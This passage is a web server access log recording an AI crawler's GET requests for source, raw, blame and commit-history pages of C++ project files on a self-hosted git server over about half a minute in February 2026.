"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" +[17/Feb/2026:15:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" +[17/Feb/2026:15:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" +[17/Feb/2026:15:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10712] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" +[17/Feb/2026:15:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" +[17/Feb/2026:15:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" +[17/Feb/2026:15:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" +[17/Feb/2026:15:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" +[17/Feb/2026:15:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49516] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" +[17/Feb/2026:15:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" +[17/Feb/2026:15:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" +[17/Feb/2026:15:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" +[17/Feb/2026:15:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" +[17/Feb/2026:15:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10412] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" +[17/Feb/2026:15:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" +[17/Feb/2026:15:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49520] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" +[17/Feb/2026:15:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" +[17/Feb/2026:15:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" +[17/Feb/2026:15:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" +[17/Feb/2026:15:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" +[17/Feb/2026:15:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" +[17/Feb/2026:15:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10198] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" +[17/Feb/2026:15:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" +[17/Feb/2026:15:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18911] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10199] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" +[17/Feb/2026:15:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10712] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18910] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" +[17/Feb/2026:15:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25012] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20677] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25009] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10412] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20673] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10413] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10211] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 